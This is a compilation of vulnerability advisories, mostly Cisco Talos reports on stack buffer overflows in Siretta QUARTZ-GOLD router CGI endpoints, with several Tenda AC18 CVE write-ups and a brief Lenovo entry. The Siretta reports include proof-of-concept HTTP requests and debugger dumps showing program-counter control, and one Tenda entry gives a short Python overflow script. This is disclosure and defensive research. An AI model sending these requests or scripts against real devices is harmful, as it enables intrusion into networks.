A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to download a previously uploaded file:

    void downfile.cgi(void)
    
    {
      [...]
    
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename = "";
      if (_filename_param != (char *)0x0) {
        filename = _filename_param;
      }
      [... calculate base_folder ...]
      if (*filename != '\0') {
        sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
        send_header(200,buff,"application/tomato-binary-file",0);
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        do_file(buff);                                                                                              [3]
      }
      return;
    }
    

The downfile.cgi expects one parameter called _filename that represents the filename of the desired file to be downloaded. At [1] the uploaded parameter is taken and then used at [2]. The function used at [2] is a sprintf, which does not take into consideration the size of the buffer. If the _filename parameter is longer than a certain length, the instruction at [2] would cause a stack-based buffer overflow that could led to remote code execution.

**Crash Information**

    $r0  : 0x0       
    $r1  : 0x0       
    $r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r3  : 0x2000    
    $r4  : 0x61666b61 ("akfa"?)
    $r5  : 0x61676b61 ("akga"?)
    $r6  : 0x61686b61 ("akha"?)
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e658  →  "downfile.cgi"
    $r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
    $r11 : 0x7ef3b784  →  "admin"
    $r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ef39070  →  "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    $lr  : 0x2ae3bb30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x61696b60 ("`kia"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ef39070│+0x0000: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"     ← $sp
    0x7ef39074│+0x0004: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39078│+0x0008: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef3907c│+0x000c: "akmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39080│+0x0010: "aknaakoaakpaakqaakraaksaaktaak"
    0x7ef39084│+0x0014: "akoaakpaakqaakraaksaaktaak"
    0x7ef39088│+0x0018: "akpaakqaakraaksaaktaak"
    0x7ef3908c│+0x001c: "akqaakraaksaaktaak"
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x61696b60
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0x61696b60 in ?? (), reason: SIGSEGV
    

**Exploit Proof of Concept**

Sending a request like the following:

    POST /downfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 1119
    
    _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>
    

The status at the return address of the downfile.cgi function would be:

    $r0  : 0x0       
    $r1  : 0x0       
    $r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r3  : 0x2000    
    $r4  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r5  : 0x00031082  →  "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]"
    $r6  : 0x0002272b  →  "/jffs"
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e658  →  "downfile.cgi"
    $r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
    $r11 : 0x7ef3b784  →  "admin"
    $r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ef39060  →  "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"
    $lr  : 0x2ae3bb30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x0000f96c  →   pop {r4,  r5,  r6,  pc}
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ef39060│+0x0000: "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"    ← $sp
    0x7ef39064│+0x0004: "akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]"
    0x7ef39068│+0x0008: "akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]"
    0x7ef3906c│+0x000c: "akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39070│+0x0010: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39074│+0x0014: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39078│+0x0018: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef3907c│+0x001c: "akmaaknaakoaakpaakqaakraaksaaktaak"
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:ARM ────
           0xf960                  mov    r0,  sp
           0xf964                  bl     0xbbc8
           0xf968                  add    sp,  sp,  #1024   ; 0x400
     →     0xf96c                  pop    {r4,  r5,  r6,  pc}
    [!] Cannot disassemble from $PC
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0xf96c in ?? (), reason: BREAKPOINT
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
    [#0] 0xf96c → pop {r4,  r5,  r6,  pc}
    [#1] 0x2ae3bb30 → free()
    

So the next instruction will populate the pc with the fourth dword contained in the stack, so:

    gef➤  hexdump dw $sp
    0x7ef39060│+0x0000   0x61666b61   
    0x7ef39064│+0x0004   0x61676b61   
    0x7ef39068│+0x0008   0x61686b61   
    0x7ef3906c│+0x000c   0x61696b61   
    [...]
    

After the pop the pc will contain the 0x61696b61 value.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-38459: TALOS-2022-1608 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has an web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

    void delfile.cgi(void)
    
    {
      [...]
    
      [... calculate the value of the base_folder variable ...]
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename_ = "";
      if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
      }
      if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
        system(command_buff);
      }
      [...]
    }
    

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and used at [2]. The function used at [2] is a sprintf, which does not take into consideration the size of the buffer. If the file name, provided through the _filename parameter, is longer than a certain length, the instruction at [2] would cause a stack-based buffer overflow that could lead to remote code execution.

**Crash Information**

    $r0  : 0x1       
    $r1  : 0x1       
    $r2  : 0x0       
    $r3  : 0x0       
    $r4  : 0x61616266 ("fbaa"?)
    $r5  : 0x61616366 ("fcaa"?)
    $r6  : 0x243     
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e66e  →  "delfile.cgi"
    $r10 : 0x0001dbdc  →  0x0001e66e  →  "delfile.cgi"
    $r11 : 0x7ea5b784  →  "admin"
    $r12 : 0x2ae4773c  →  0x2ae33ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ea59070  →  "feaaffaafgaafhaafiaafjaaf"
    $lr  : 0x2ae2db30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x61616464 ("ddaa"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x7ea59070│+0x0000: "feaaffaafgaafhaafiaafjaaf"  ← $sp
    0x7ea59074│+0x0004: "ffaafgaafhaafiaafjaaf"
    0x7ea59078│+0x0008: "fgaafhaafiaafjaaf"
    0x7ea5907c│+0x000c: "fhaafiaafjaaf"
    0x7ea59080│+0x0010: "fiaafjaaf"
    0x7ea59084│+0x0014: "fjaaf"
    0x7ea59088│+0x0018: 0x312f0066 ("f"?)
    0x7ea5908c│+0x001c: ".1\r\n"
    ──── code:arm:ARM ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x61616464
    ──── threads ────
    [#0] Id 1, Name: "httpd", stopped 0x61616464 in ?? (), reason: SIGSEGV
    

**Exploit Proof of Concept**

Sending a request like the following:

    POST /delfile.cgi HTTP/1.1
    Host: 192.168.0.1
    Authorization: Basic <a valid basic auth value>
    Connection: close
    Content-Length: 579
    
    _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaaf&_http_id=<the correct tid>
    

The status at the return address of the delfile.cgi function would be:

    $r0  : 0x1       
    $r1  : 0x1       
    $r2  : 0x0       
    $r3  : 0x0       
    $r4  : 0x00019369  →  0x6e6f4300
    $r5  : 0x0002272b  →  "/jffs"
    $r6  : 0x243     
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e66e  →  "delfile.cgi"
    $r10 : 0x0001dbdc  →  0x0001e66e  →  "delfile.cgi"
    $r11 : 0x7ea5b784  →  "admin"
    $r12 : 0x2ae4773c  →  0x2ae33ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ea59064  →  "fbaafcaafdaafeaaffaafgaafhaafiaafjaaf"
    $lr  : 0x2ae2db30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x0000fa48  →   pop {r4,  r5,  pc}
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ea59064│+0x0000: "fbaafcaafdaafeaaffaafgaafhaafiaafjaaf"      ← $sp
    0x7ea59068│+0x0004: "fcaafdaafeaaffaafgaafhaafiaafjaaf"
    0x7ea5906c│+0x0008: "fdaafeaaffaafgaafhaafiaafjaaf"
    0x7ea59070│+0x000c: "feaaffaafgaafhaafiaafjaaf"
    0x7ea59074│+0x0010: "ffaafgaafhaafiaafjaaf"
    0x7ea59078│+0x0014: "fgaafhaafiaafjaaf"
    0x7ea5907c│+0x0018: "fhaafiaafjaaf"
    0x7ea59080│+0x001c: "fiaafjaaf"
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:ARM ────
           0xfa3c                  mov    r0,  r4
           0xfa40                  bl     0xbae4
           0xfa44                  add    sp,  sp,  #516    ; 0x204
     →     0xfa48                  pop    {r4,  r5,  pc}
    [!] Cannot disassemble from $PC
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0xfa48 in ?? (), reason: BREAKPOINT
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
    [#0] 0xfa48 → pop {r4,  r5,  pc}
    [#1] 0x2ae2db30 → free()
    

So the next instruction will populate the pc with the third dword contained in the stack, so:

    gef➤  hexdump dword $sp
    0x7ea59064│+0x0000   0x61616266   
    0x7ea59068│+0x0004   0x61616366   
    0x7ea5906c│+0x0008   0x61616466   
    

After the pop the pc will contain the 0x61616466 value.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-36279: TALOS-2022-1605 || Cisco Talos Intelligence Group

Francesco Benvenuto of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.
The Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and

Thursday, January 26, 2023 16:01

_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.

The Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.

**Quartz-Gold Vulnerabilities**

Several OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. TALOS-2022-1607 (CVE-2022-40969) and TALOS-2022-1612 (CVE-2022-40220) can be triggered with HTTP requests, while TALOS-2022-1615 (CVE-2022-38066), TALOS-2022-1638 (CVE-2022-40222) and TALOS-2022-1640 (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.

Three directory traversals were recorded in QUARTZ-GOLD, TALOS-2022-1606 (CVE-2022-40701) and TALOS-2022-1637 (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. TALOS-2022-1609 (CVE-2022-38088) can lead to arbitrary file read.

Three stack-based buffer overflows were found: TALOS-2022-1605 (CVE-2022-36279) and TALOS-2022-1608 (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. TALOS-2022-1613 (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.

A heap-based buffer overflow vulnerability was also reported in TALOS-2022-1639 (CVE-2022-41991), which can be triggered by a network request.

Two other vulnerabilities were discovered, including TALOS-2022-1610 (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and TALOS-2022-1611 (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.

**FreshTomato Vulnerabilities**

In FreshTomato, there is TALOS-2022-1641 (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, TALOS-2022-1642 (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.

Cisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/add_white_node.

****CVE-2023-24167****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "add\_white\_node" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24167: Tenda/1.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_0007343c.

****CVE-2023-24169****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "FUN\_0007343c" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24169: Tenda/6.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.

****CVE-2023-24166****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

import requests
from pwn import \*

url \= 'http://x.x.x.x/goform/WifiBasicSet'
pl \= 'a'\*564+p32(0xdeadbeef)
data \= {'security\_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid\_5g':'1', 'ssid\_5g':'1', 'wrlPwd\_5g': '1'}

requests.post(url, data\=data)

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24166: Tenda/2.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/fromSetWirelessRepeat.

****CVE-2023-24170****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "fromSetWirelessRepeat" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24170: Tenda/3.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_000c2318.

****CVE-2023-24164****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "FUN\_000c2318" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24164: Tenda/4.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/initIpAddrInfo.

****CVE-2023-24165****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

AC18升级软件\_腾达(Tenda)官方网站

****3\. Vulnerability details****

The function "initIpAddrInfo" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24165: Tenda/7.md at main · DrizzlingSun/Tenda

A buffer overflow in the ReadyBootDxe driver in some Lenovo Notebook products may allow an attacker with local privileges to execute arbitrary code.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Sales Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

Tag

#buffer_overflow